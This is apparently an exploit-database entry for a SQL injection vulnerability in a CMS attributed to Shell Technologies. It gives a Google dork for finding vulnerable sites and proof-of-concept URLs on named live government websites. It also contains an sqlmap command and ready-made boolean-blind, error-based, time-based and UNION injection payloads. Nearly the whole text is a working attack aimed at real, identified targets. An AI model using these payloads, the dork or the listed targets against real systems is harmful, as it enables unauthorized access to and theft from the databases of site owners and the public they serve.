=========================================================
# Exploit Title: Shell Technologies CMS - SQL Injection
# Google Dork: intext:"Developed by Shell Technologies" inurl:".php?id="
# Date: 2021-07-08
# Exploit Author: Mr.B3nY
# Vendor Homepage: www.shelltechnologiesbd.com
# Tested on: Parrot OS
# Vulnerability : SQL Injection Vulnerability
=========================================================
[+] POC :- http://www.14upazilaudd.gov.bd/video-gallery.php?uap=3'
[+] POC :- http://www.14upazilaudd.gov.bd/image_gallery.php?id=4'
[+] POC :- http://www.mudp.gov.bd/video-gallery.php?uap=1'
[+] POC :- http://www.mudp.gov.bd/photo-gallery.php?id=1'
=========================================================
SQLMap
++++++++++++++++++++++++++
sqlmap -u "<url>/video-gallery.php?uap=3" --dbs
++++++++++++++++++++++++++
Parameter: uap (GET)
Type: boolean-based blind
Payload: uap=(SELECT (CASE WHEN (2253=2253) THEN 3 ELSE (SELECT 2255 UNION SELECT 1454) END))
Type: error-based
Payload: uap=3 AND (SELECT 6256 FROM(SELECT COUNT(*),CONCAT(0x717a6a6b71,(SELECT (ELT(6256=6256,1))),0x7178766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Payload: uap=3 OR (SELECT 6023 FROM (SELECT(SLEEP(5)))SDyl)
Type: UNION query
Payload: uap=-2305 UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a6b71,0x5748654d506b485948766f4a43484969426b546971524351515a416952544f5844645a684a464b6b,0x7178766b71),NULL-- -
=========================================================